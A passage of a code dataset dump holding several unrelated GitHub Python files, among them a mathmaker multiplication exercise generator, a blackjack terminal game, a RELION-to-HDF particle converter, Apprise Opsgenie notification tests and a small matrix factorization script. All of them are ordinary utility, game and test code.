random.sample(nb_list, 2)\n self.product = Product([self.nb1, self.nb2]).evaluate()\n self.transduration = 9\n\n def q(self, **options):\n # self.substitutable_question_mark = True\n return _('{q_mark} × {q_mark} = {n}\\n\\n'\n '(in the multiplication tables, from 2 to 9)')\\\n .format(n=Value(self.product).into_str(),\n q_mark=COLORED_QUESTION_MARK)\n\n def a(self, **options):\n # This is actually meant for self.preset == 'mental calculation'\n if self.product == 12:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 6]).printed),\n product2=shared.machine.write_math_style2(\n Product([3, 4]).printed))\n\n elif self.product == 16:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 8]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 4]).printed))\n\n elif self.product == 18:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 9]).printed),\n product2=shared.machine.write_math_style2(\n Product([3, 6]).printed))\n\n elif self.product == 24:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([3, 8]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 6]).printed))\n\n elif self.product == 36:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([6, 6]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 9]).printed))\n\n else:\n return shared.machine.write_math_style2(Product([self.nb1,\n self.nb2])\n .printed)\n\n def js_a(self, **kwargs):\n if self.product == 12:\n return [Product([2, 6]).jsprinted, Product([6, 2]).jsprinted,\n Product([3, 4]).jsprinted, Product([4, 3]).jsprinted]\n elif self.product == 16:\n return [Product([2, 8]).jsprinted, Product([8, 2]).jsprinted,\n Product([4, 4]).jsprinted]\n elif self.product == 18:\n return [Product([2, 9]).jsprinted, Product([9, 2]).jsprinted,\n Product([3, 6]).jsprinted, Product([6, 3]).jsprinted]\n elif self.product == 24:\n return [Product([3, 8]).jsprinted, Product([8, 3]).jsprinted,\n Product([4, 6]).jsprinted, Product([6, 4]).jsprinted]\n elif self.product == 36:\n return [Product([4, 9]).jsprinted, Product([9, 4]).jsprinted,\n Product([6, 6]).jsprinted]\n else:\n return [Product([self.nb1, self.nb2]).jsprinted,\n Product([self.nb2, self.nb1]).jsprinted]\n","repo_name":"nicolashainaux/mathmaker","sub_path":"mathmaker/lib/document/content/calculation/multi_reversed.py","file_name":"multi_reversed.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41855222267","text":"T = int(input())\r\nfor test in range(T):\r\n house = []\r\n input1 = input()\r\n input1 = input1.split()\r\n N = int(input1[0])\r\n B = int(input1[1])\r\n input2 = input()\r\n input2 = input2.split()\r\n for x in input2:\r\n price = int(x)\r\n dictionary = {\"house\":x,\"price\":price}\r\n house.append(dictionary)\r\n \r\n def myFunc(e):\r\n return e['price']\r\n\r\n house.sort(key=myFunc)\r\n\r\n spent = 0\r\n purchased = 0\r\n\r\n for x in house:\r\n variable1 = x.get('price')\r\n spent += variable1\r\n if spent <= B:\r\n purchased += 1\r\n\r\n print(f\"Case #{test+1}: 
{purchased}\")","repo_name":"Hackerzone27/abcd","sub_path":"gpaper2.py","file_name":"gpaper2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23661477028","text":"# Command line Blackjack - Created by Brenton O'Brien\n\n# Imports\nimport random\nimport os\nimport time\n\n# Global Variables\nchips = 100\nbet_amount = 0\nuser_hand = []\ndealer_hand = []\ndeck = []\nhas_hit = False\nhas_sat = False\ngot_bet = False\n\n\n# Create and shuffle a deck of cards\ndef create_deck():\n global deck\n suits = [\"Hearts\", \"Diamonds\", \"Spades\", \"Clubs\"]\n values = [\"Ace\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\"]\n deck = [f\"{value} of {suit}\" for value in values for suit in suits] # Creates a list of 52 un-shuffled cards\n random.shuffle(deck) # Shuffles the deck\n\n\n# Create value system for cards\ndef calculate_card_value(card):\n value_dict = {\"Ace\": 11, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9, \"10\": 10, \"Jack\": 10, \"Queen\": 10, \"King\": 10}\n for item in value_dict: # Loops through the 'keys' of the dictionary\n if item in card: # Checks to see if the 'key' is in the name of the card (i.e. if '2' is in '2 of Hearts')\n return value_dict[item] # Returns the 'Key's corresponding 'Value' integer\n\n\n# Count the value of a players hand, will also convert aces from 11 to 1 if the hand value is larger than 21\ndef count_hand_value(player_hand):\n current_value = 0 # Starts from zero each time the players hand needs to be counted\n for card in player_hand:\n current_value += calculate_card_value(card) # Adds up the value of each card in the players hand\n\n # The following code will track the amount of aces in a players hand so that it can be converted from 11 to 1 if the hand value is larger than 21\n ace_count = 0\n for card in player_hand: # Adds the amount of aces up\n if \"Ace\" in card:\n ace_count += 1\n\n while current_value > 21 and ace_count > 1: # If the value is larger than 21, convert the available aces from 11 to 1 until the value is under 21\n if ace_count >= 1: # Only run if aces are in the hand\n current_value -= 10 # Minus 10 from the value\n ace_count -= 1 # Remove the ace\n\n return current_value\n\n\n# Removes card from the deck and adds it the dealer or user hand\ndef deal_card(player): # The player parameter can be used to deal cards to either the user or the dealer\n global deck\n player.append(deck.pop())\n\n\n# Ask user for bet (Minimum $5), also controls user\ndef get_bet():\n global bet_amount, chips\n print(\"\\n******************** BLACKJACK ********************\")\n print(f\"\\nCurrent chips: ${chips}\")\n\n try:\n bet_amount = int(input('\\n\\n\\n\\n\\n\\n\\n\\n\\n***************************************************'\n '\\nPlease Enter an amount to bet (Minimum bet is $5)\\n\\n> $')) #This strange formatting is used to keep the look consistent\n\n if bet_amount > chips: # Stops bet being higher than the current amount of user chips\n print(f\"Bet is too high, you only have ${chips}\")\n time.sleep(2) # Keeps the message up for two seconds before clearing it and rerunning the function\n cls()\n get_bet()\n\n elif bet_amount < 5: # Ensures bet is higher than the minimum bet\n print(f\"Bet is too low, minimum bet is $5\")\n time.sleep(2)\n cls()\n get_bet()\n\n elif 5 <= bet_amount <= chips: # If valid bet, subtract it from the total bet and continue 
main_game_loop()\n chips = chips - bet_amount\n\n except ValueError:\n print(f\"Incorrect input, please enter a valid number\") # Only allows valid integers to be typed\n time.sleep(2)\n cls()\n get_bet()\n\n\n# Displays the main board, (cards, hand value, current chips and current bet) can also control when to show the dealers second card\ndef display_game_board():\n global bet_amount, has_sat\n\n print(\"\\n******************** BLACKJACK ********************\")\n print(f\"\\nCurrent Chips: ${chips}\")\n print(f\"\\nBet Amount: ${bet_amount}\")\n\n if has_sat: # If the user has sat, then allow the second dealer card to be showed\n print(f\"\\nDealer Hand: {', '.join(dealer_hand)}\")\n print(f\"Dealer Amount: {count_hand_value(dealer_hand)}\")\n\n else: # If the user hasn't sat yet, then only show the first card, and get the value of that first card only\n print(f\"\\nDealer Hand: {dealer_hand[0]}\")\n print(f\"Dealer Amount: {calculate_card_value(dealer_hand[0])}\")\n\n print(f\"\\nUser Hand: {', '.join(user_hand)}\")\n print(f\"User Amount: {count_hand_value(user_hand)}\\n\")\n print(\"***************************************************\")\n\n\n# Clears the terminal screen\ndef cls():\n os.system('cls')\n\n\ndef reset_variables(): # Used to reset all the required variables prior to each new hand being played\n global bet_amount, user_hand, dealer_hand, deck, has_sat, has_hit, got_bet\n\n bet_amount = 0\n user_hand = []\n dealer_hand = []\n deck = []\n has_hit = False\n has_sat = False\n got_bet = False\n\n\n# Check for blackjack when cards are first dealt, will also pay out chips if required, and gives reset prompt\ndef check_for_blackjack(userhand, dealerhand):\n global chips, bet_amount, has_sat, has_hit\n\n if count_hand_value(dealerhand) == 21 and count_hand_value(userhand) == 21: # Accounts for if both players hit blackjack\n has_sat = True # This variable is set to true so that the dealers second card is revealed in display_board() after cls()\n cls()\n display_game_board()\n chips += bet_amount # Gives the bet back to the user\n reset_prompt('Draw! Both Players Have Blackjack')\n\n elif count_hand_value(dealerhand) == 21: # Accounts for if only dealer hits blackjack\n has_sat = True\n cls()\n display_game_board()\n reset_prompt('Dealer has Blackjack! User loses')\n\n elif count_hand_value(userhand) == 21: # Accounts for if only the dealer hits blackjack\n has_sat = True\n cls()\n display_game_board()\n if has_hit: # This accounts for if the user has hit already (therefore it is not technically blackjack)\n chips += bet_amount * 2\n else:\n chips += (bet_amount * 3) # Pays out if it is blackjack\n reset_prompt('User has Blackjack! 
User wins')\n\n\n# Ask player to hit or sit, runs the respective function\ndef hit_or_sit_prompt():\n answer = ''\n while answer not in ['1', '2']:\n answer = input('Would you like to hit or sit?\\n\\n1) Hit\\n2) Sit\\n>')\n\n if answer == '1':\n hit()\n\n elif answer == '2':\n sit()\n\n else:\n cls()\n display_game_board()\n\n\ndef reset_prompt(message): # This message will ask if the user wants to play again and also have a custom message to describe the result of the last hand\n replay_input = input(f'{message}!\\n\\n1) Bet again\\n2) EXIT\\n>')\n\n while replay_input not in [\"1\", \"2\"]:\n cls()\n display_game_board()\n replay_input = input('Would you like to bet again?\\n1) Bet again\\n2) EXIT\\n>')\n\n if replay_input == \"1\":\n cls()\n reset_variables()\n main_game_loop()\n\n elif replay_input == \"2\":\n exit()\n\n\ndef hit(): # Runs when the player hits, will track if the player busts, if not, asks the play to hit or sit\n global user_hand, has_hit\n\n has_hit = True\n\n deal_card(user_hand)\n cls()\n display_game_board()\n\n if count_hand_value(user_hand) > 21:\n replay_input = input('User Busts!\\n\\n1) Bet again\\n2) EXIT\\n>')\n\n while replay_input not in [\"1\", \"2\"]:\n cls()\n display_game_board()\n replay_input = input('Would you like to bet again?\\n1) Bet again\\n2) EXIT\\n>')\n\n if replay_input == \"1\":\n cls()\n reset_variables()\n main_game_loop()\n\n elif replay_input == \"2\":\n exit()\n\n else:\n hit_or_sit_prompt()\n\n\ndef sit(): # Continues to add cards to the dealers hand until they hit at least 16\n global has_sat, chips\n has_sat = True\n\n while count_hand_value(dealer_hand) < 16:\n deal_card(dealer_hand)\n cls()\n display_game_board()\n time.sleep(1)\n\n cls() # These two lines are used to display the dealers second card after has_sat = True\n display_game_board()\n\n if count_hand_value(dealer_hand) > 21: # Dealer busts and user gets paid their winning chips\n chips += (bet_amount * 2)\n reset_prompt('Dealer Busts')\n\n elif count_hand_value(user_hand) == count_hand_value(dealer_hand): # Handles the draw\n chips += bet_amount\n reset_prompt('Draw')\n\n elif count_hand_value(user_hand) > count_hand_value(dealer_hand): # Handles if player is closer to 21\n chips += (bet_amount * 2)\n reset_prompt('User Wins')\n\n elif count_hand_value(user_hand) < count_hand_value(dealer_hand): # Handles if dealer is closer to 21\n reset_prompt('Dealer Wins')\n\n\n# Create Main loop - Gets a bet, then creates a deck and deals cards, shows the board, checks for blackjack, then asks the hit/sit prompt\ndef main_game_loop():\n global got_bet, has_sat, chips\n\n if chips > 0: # Checks to see if there is at least 1 chip to bet\n\n if not got_bet: # Gets the initial bet\n get_bet()\n got_bet = True\n\n # Clears the screen\n cls()\n\n # Creates and shuffles a deck\n create_deck()\n\n # Deal Cards to dealer and user\n deal_card(dealer_hand)\n deal_card(dealer_hand)\n deal_card(user_hand)\n deal_card(user_hand)\n\n # Displays All cards, the current bet, and remaining chips\n display_game_board()\n\n # Checks to see if the user or player has hit blackjack\n check_for_blackjack(user_hand, dealer_hand)\n\n # Asks the user to hit or sit\n hit_or_sit_prompt()\n\n else: # If out of chips ask if the player wants to play again or quit\n cls()\n\n print(\"\\n******************** BLACKJACK ********************\")\n replay_prompt = input('\\nYou are out of chips!\\n\\nWould you like to restart with $100 chips or quit the game\\n1) RESTART\\n2) QUIT\\n>')\n\n if replay_prompt == '1':\n 
cls()\n chips = 100\n main_game_loop()\n\n elif replay_prompt == '2':\n exit()\n\n\nmain_game_loop() # Runs the game when first booting the program\n","repo_name":"brenton-obrien/python-cmd-blackjack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41900306488","text":"\"\"\"migrate again\n\nRevision ID: c198a100215b\nRevises: a261b0c1e51b\nCreate Date: 2018-02-15 08:41:40.065096\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c198a100215b'\ndown_revision = 'a261b0c1e51b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('blogposts', sa.Column('fake_date', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('blogposts', 'fake_date')\n # ### end Alembic commands ###\n","repo_name":"MaryMbugua/personalblog","sub_path":"migrations/versions/c198a100215b_migrate_again.py","file_name":"c198a100215b_migrate_again.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4428442483","text":"#! python3\n# lucky.py - Opens several Google search results\n\nimport requests, sys, webbrowser, bs4\n\nprint('Googling...')\nres = requests.get('http://google.com/search?q=' + ' '.join(sys.argv[1:])) #Downloads the search page\nres.raise_for_status() #Checks for validity\n\n#Retrieve top search result links\nsoup = bs4.BeautifulSoup(res.text,\"html.parser\")\n\n#Opens browser tab for each result\nlinkElems = soup.select('.r a') #Finding all class elements that have r CSS class\nnumOpen = min(5, len(linkElems)) #Opens first 5 results or however many there are\nfor i in range(numOpen):\n\twebbrowser.open('http://google.com'+linkElems[i].get('href'))\n\t","repo_name":"ndpark/PythonScripts","sub_path":"lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42259808847","text":"from algo.search.common import get_random_list\n\n\ndef sort(lst):\n n = len(lst)\n for i in range(1, n):\n val = lst[i]\n j = i - 1\n while j >= 0 and val < lst[j]:\n lst[j+1] = lst[j]\n j -= 1\n lst[j + 1] = val\n\n\nif __name__ == '__main__':\n l = get_random_list(0, 100, 5)\n print(l)\n sort(l)\n print(l)\n","repo_name":"urm8/ads","sub_path":"algo/sort/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
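The insertion sort above costs O(n²) comparisons and shifts in the worst case but degrades gracefully to O(n) on nearly-sorted input. A hedged alternative sketch using the standard library's `bisect`, which finds each insertion point in O(log n) (the element shifts remain linear):

```python
import bisect

def insertion_sort_bisect(lst):
    out = []
    for val in lst:
        bisect.insort(out, val)  # binary-search the slot, then insert
    return out

print(insertion_sort_bisect([5, 2, 9, 1]))  # [1, 2, 5, 9]
```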
+{"seq_id":"12479999761","text":"from PyInquirer import style_from_dict, prompt, Token\nfrom client.api.commande_Client import CommandeAppliClient\n\nclass Add_menu:\n def __init__(self) -> None:\n self.style = style_from_dict({\n Token.Separator : '#fff', #white\n Token.QuestionMark : '#000', #black\n Token.Selected : '#00BFFF', #sky blue\n Token.Pointer : '#fff', #white\n Token.Instruction : '#fff', #white\n Token.Answer : '#008000 bold', #green\n Token.Question : '#FF7F50', #shade of orange\n })\n \n def add_menu(self,list_id_resto, list_resto, info_client, list_menu,idr,commande):\n liste = [\"Back\"]\n liste_prix=[\"\"]\n for i in range(len(list_menu)):\n liste.append(list_menu[i][\"nom\"])\n liste_prix.append(list_menu[i][\"prix\"])\n liste_affichage = []\n for i in range(len(liste)):\n if(i==0):\n liste_affichage.append(liste[i] + \" \" + str(liste_prix[i]))\n else : \n liste_affichage.append(liste[i] + \" \" + str(liste_prix[i])+ \" €\")\n elements = [\n {\n 'type' : 'list',\n 'name' : 'capital',\n 'message' : 'What would you like to do?:',\n 'choices' : liste_affichage\n }\n ]\n list_choix = prompt(elements, style=self.style)\n choix = list_choix[\"capital\"]\n\n if(choix==liste_affichage[0]):\n from client.views.view_order import Display_content_order\n return Display_content_order().create_order(list_id_resto, list_resto, info_client, list_menu,idr,commande)\n \n menu_choisis = list_menu[liste_affichage.index(choix)-1]\n \n c = CommandeAppliClient.add_menu(menu_choisis['nom'],commande[\"username\"],commande[\"id_restaurant\"],commande[\"date\"],commande[\"contenu\"])\n print(\"The menu \" + menu_choisis['nom'] + \" has been added to your order.\")\n from client.views.view_order import Display_content_order\n return Display_content_order().create_order(list_id_resto,list_resto,info_client,list_menu,idr,c)\n \n ","repo_name":"lk34000/EnsaEats","sub_path":"client/views/add_menu.py","file_name":"add_menu.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74422949492","text":"#!/usr/bin/env python\n# Usage: dstar2hdf.py star_file stackout\n# created by Jingqi \n# 6/11/2017\n\nimport sys\nfrom subprocess import Popen,PIPE\nfrom EMAN2 import *\nfrom sparx import *\n\n# global variables\napix = float(1.63)\nbfactor = float(0)\nampas = float(0)\nangas = float(0)\n\ndef get_image(wheresptcl): \n \"\"\" Get the particle from the relion mrcs (take a single string as input). \"\"\"\n ptcl_path = wheresptcl.split('@')[1][:-4]+\"hdf\"\n ptcl_index = int(wheresptcl.split('@')[0])-1\n image = EMData().read_image(ptcl_path,ptcl_index)\n return image\n\ndef ctf_gen(dfxu,dfxv,cs,voltage,amp_contrast): \n \"\"\"Retrieve the ctf values from a star file.\"\"\"\n\n # defocus = (defocusU + defocusV)/2, unit in A.\n defocus = (dfxu+dfxv)/2\n # Although EMAN or sparx take the defocus value in um, the generate_ctf function converts A into um, so no extra conversion is needed for the defocus value. 
\n ctf_list = [defocus, cs, voltage, apix, bfactor, amp_contrast, ampas, angas]\n img_ctf = generate_ctf(ctf_list)\n return img_ctf\n\n\nstar_file = sys.argv[1]\nstackout = sys.argv[2]\n\n# Get line index\n## _rlnImageName (particle image)\nptcl_line = Popen(['grep','_rlnImageName',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnDefocusU\ndfxu_line = Popen(['grep','_rlnDefocusU',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnDefocusV\ndfxv_line = Popen(['grep','_rlnDefocusV',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnSphericalAberration\ncs_line = Popen(['grep','_rlnSphericalAberration',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnVoltage\nkev_line = Popen(['grep','_rlnVoltage',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnAmplitudeContrast\nampc_line = Popen(['grep','_rlnAmplitudeContrast',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnCoordinateX\ncrdx_line = Popen(['grep','_rlnCoordinateX',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnCoordinateY\ncrdy_line = Popen(['grep','_rlnCoordinateY',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnMicrographName\nmic_line = Popen(['grep','_rlnMicrographName',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n\ni = 0\nfor row in open(star_file).read().split('\\n'):\n if len(row.split()) > 4: \n star_row = row.split()\n# Particle image \n wheresptcl = star_row[int(ptcl_line)-1]\n image = get_image(wheresptcl)\n# CTF object\n dfxu = float(star_row[int(dfxu_line)-1])\n dfxv = float(star_row[int(dfxv_line)-1])\n cs = float(star_row[int(cs_line)-1])\n voltage = float(star_row[int(kev_line)-1])\n amp_contrast = float(star_row[int(ampc_line)-1])\n image_ctf = ctf_gen(dfxu,dfxv,cs,voltage,amp_contrast)\n image.set_attr(\"ctf\", image_ctf)\n# Set other attributes\n crdx = float(star_row[int(crdx_line)-1])\n crdy = float(star_row[int(crdy_line)-1])\n image.set_attr(\"ptcl_source_coord\",[crdx,crdy])\n mic_source = star_row[int(mic_line)-1]\n image.set_attr(\"ptcl_source_image\",mic_source)\n# write stack \n image.write_image(stackout, i)\n i += 1\n\n#---END---\n","repo_name":"duanjingqi/CryoEM-sparx-python-utilities","sub_path":"dstar2hdf.py","file_name":"dstar2hdf.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14219068702","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\napp_name = \"review\"\n\nurlpatterns = [\n path('detail/', detail, name='detail'),\n path('new/', new, name='new'),\n path('allreviews', allReviews, name=\"allreviews\"),\n path('', index, name='index'),\n path('search/', showSearch, name=\"search\"),\n path('delete//', delete, name=\"delete\"),\n]","repo_name":"hildakim/muse","sub_path":"review/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15224762957","text":"from unittest import mock\n\nimport requests\nimport apprise\nfrom apprise.plugins.NotifyOpsgenie import NotifyOpsgenie, OpsgeniePriority\nfrom helpers import AppriseURLTester\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# a test UUID we can use\nUUID4 = '8b799edf-6f98-4d3a-9be7-2862fb4e5752'\n\n# Our Testing URLs\napprise_url_tests = (\n ('opsgenie://', {\n # We failed to identify any valid authentication\n 
'instance': TypeError,\n }),\n ('opsgenie://%20%20/', {\n # invalid apikey specified\n 'instance': TypeError,\n }),\n ('opsgenie://apikey/user/?region=xx', {\n # invalid region id\n 'instance': TypeError,\n }),\n ('opsgenie://apikey/', {\n # No targets specified; this is allowed\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/user', {\n # Valid user\n 'instance': NotifyOpsgenie,\n 'privacy_url': 'opsgenie://a...y/%40user',\n }),\n ('opsgenie://apikey/@user?region=eu', {\n # European Region\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?entity=A%20Entity', {\n # Assign an entity\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?alias=An%20Alias', {\n # Assign an alias\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?priority=p3', {\n # Assign our priority\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/?tags=comma,separated', {\n # Test our 'tags' (tag is reserved in Apprise) but not 'tags'\n # Also test the fact we do not need to define a target\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?priority=invalid', {\n # Invalid priority (loads using default)\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/user@email.com/#team/*sche/^esc/%20/a', {\n # Valid user (email), valid schedule, Escalated ID,\n # an invalid entry (%20), and too short of an entry (a)\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@{}/#{}/*{}/^{}/'.format(\n UUID4, UUID4, UUID4, UUID4), {\n # similar to the above, except we use the UUIDs\n 'instance': NotifyOpsgenie,\n }),\n # Same link as before but @ missing at the front causing an ambiguous\n # lookup; however the entry is treated as though a @ was in front (user)\n ('opsgenie://apikey/{}/#{}/*{}/^{}/'.format(\n UUID4, UUID4, UUID4, UUID4), {\n # similar to the above, except we use the UUIDs\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey?to=#team,user&+key=value&+type=override', {\n # Test to= and details (key/value pair) also override 'type'\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/@user/?batch=yes', {\n # Test batch=\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/@user/?batch=no', {\n # Test batch=\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://?apikey=abc&to=user', {\n # Test Kwargs\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/user/', {\n 'instance': NotifyOpsgenie,\n # throw a bizarre code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('opsgenie://apikey/#topic1/device/', {\n 'instance': NotifyOpsgenie,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracefully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_opsgenie_urls():\n \"\"\"\n NotifyOpsgenie() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_opsgenie_config_files(mock_post):\n \"\"\"\n NotifyOpsgenie() Config File Cases\n \"\"\"\n content = \"\"\"\n urls:\n - opsgenie://apikey/user:\n - priority: 1\n tag: opsgenie_int low\n - priority: \"1\"\n tag: opsgenie_str_int low\n - priority: \"p1\"\n tag: opsgenie_pstr_int low\n - priority: low\n tag: opsgenie_str low\n\n # This will take on moderate (default) priority\n - priority: invalid\n tag: opsgenie_invalid\n\n - opsgenie://apikey2/user2:\n 
- priority: 5\n tag: opsgenie_int emerg\n - priority: \"5\"\n tag: opsgenie_str_int emerg\n - priority: \"p5\"\n tag: opsgenie_pstr_int emerg\n - priority: emergency\n tag: opsgenie_str emerg\n \"\"\"\n\n # Prepare Mock\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n\n # Create ourselves a config object\n ac = apprise.AppriseConfig()\n assert ac.add_config(content=content) is True\n\n aobj = apprise.Apprise()\n\n # Add our configuration\n aobj.add(ac)\n\n # We should be able to read our 9 servers from that\n # 4x low\n # 4x emerg\n # 1x invalid (so takes on normal priority)\n assert len(ac.servers()) == 9\n assert len(aobj) == 9\n assert len([x for x in aobj.find(tag='low')]) == 4\n for s in aobj.find(tag='low'):\n assert s.priority == OpsgeniePriority.LOW\n\n assert len([x for x in aobj.find(tag='emerg')]) == 4\n for s in aobj.find(tag='emerg'):\n assert s.priority == OpsgeniePriority.EMERGENCY\n\n assert len([x for x in aobj.find(tag='opsgenie_str')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_str_int')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_pstr_int')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_int')]) == 2\n\n assert len([x for x in aobj.find(tag='opsgenie_invalid')]) == 1\n assert next(aobj.find(tag='opsgenie_invalid')).priority == \\\n OpsgeniePriority.NORMAL\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_opsgenie.py","file_name":"test_plugin_opsgenie.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"}\n+{"seq_id":"27037031603","text":"# Matrix factorization: R = P * Q.T\n# Given an R that contains NaN entries, estimate P and Q\n# by Stochastic Gradient Descent\n# -------------------------------------------\nimport numpy as np\n# alpha: learning rate\n# beta: for regularization - too large a value causes underfitting\n# err_limit: early stopping - stop once the error moves less than this\nstop = []\nerror = []\ndef factorize_matrix(R, K, max_iter=5000, alpha=0.01, beta=0.01, err_limit=0.0001, verbose=False):\n n_user = R.shape[0]\n n_item = R.shape[1]\n \n P = np.random.rand(n_user, K) # user-factor matrix\n Q = np.random.rand(K, n_item) # factor-item matrix\n old_err = 99999999 # error before training\n \n for step in range(max_iter):\n for i in range(n_user):\n for j in range(n_item):\n if not np.isnan(R[i, j]): # if the entry is not NaN\n eij = R[i, j] - np.dot(P[i, :], Q[:, j]) # dot product of two vectors, not a matrix operation\n \n # update P, Q - one row/column at a time\n P[i, :] += alpha * (eij * Q[:, j] - beta * P[i, :])\n Q[:, j] += alpha * (eij * P[i, :] - beta * Q[:, j])\n\n # total error after updating P and Q\n tot_err = 0\n for i in range(n_user):\n for j in range(n_item):\n if not np.isnan(R[i, j]):\n tot_err += (R[i, j] - np.dot(P[i, :], Q[:, j])) ** 2\n \n if verbose:\n print('step : {}, error = {:.4f}'.format(step, tot_err))\n stop.append(step)\n error.append(tot_err)\n # early stopping\n if np.abs(old_err - tot_err) < err_limit:\n break\n old_err = tot_err\n\n if step >= max_iter - 1:\n print('Did not converge within max_iter={} steps.'.format(max_iter))\n print('Increase max_iter or raise err_limit.')\n \n return P, Q\n\n# User-item matrix\nN = np.nan\nR = np.array([[4, N, N, 2, N],\n [N, 5, N, 3, 1],\n [N, N, 3, 4, 4],\n [5, 2, 1, 2, N]])\n\nk = 3 # number of factors - chosen by the user\nP, Q = factorize_matrix(R, k, verbose=True)\nER = np.dot(P, Q) # estimated R\n\nprint('\\nR :')\nprint(np.round(R, 2))\nprint('\\nEstimated R :')\nprint(np.round(ER, 2)) \nprint('\\nP :')\nprint(np.round(P, 2))\nprint('\\nQ.T :')\nprint(np.round(Q.T, 
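# A minimal sketch of how the learned factors are actually used: any cell of
# R, including the NaN ones, is predicted by the dot product of the matching
# user row of P and item column of Q (exact values depend on the random init):
missing_pred = np.dot(P[0, :], Q[:, 1])  # estimate for the NaN at R[0, 1]
print('predicted R[0, 1] = {:.2f}'.format(missing_pred))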
